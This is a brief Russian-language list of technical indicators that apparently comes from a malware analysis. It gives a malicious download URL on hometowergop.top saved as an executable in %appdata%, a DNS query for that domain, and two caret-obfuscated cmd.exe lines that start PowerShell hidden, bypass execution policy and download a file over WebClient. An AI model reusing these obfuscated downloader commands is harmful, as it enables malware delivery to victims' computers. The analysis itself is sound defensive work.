Техническая информация
- http://hometowergop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^O^wErsh^E^lL.E^x^e^ -^e^X^e^C^UtION^p^olic^y B^YPAS^S^ -^nOpR^OFI^LE -^WiNDOWs^Ty^le^ Hi^dd^EN ^(new^-^oBJ^e^C^t ^S^ysTe^M^.^Ne^T.^W^Eb^CL^iENt^).^dOwN^loa^dF^Ile(^'http...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /c "p^O^wErsh^E^lL.E^x^e^ -^e^X^e^C^UtION^p^olic^y B^YPAS^S^ -^nOpR^OFI^LE -^WiNDOWs^Ty^le^ Hi^dd^EN ^(new^-^oBJ^e^C^t ^S^ysTe^M^.^Ne^T.^W^Eb^CL^iENt^).^dOwN^loa^dF^Ile(^'http...' (со скрытым окном)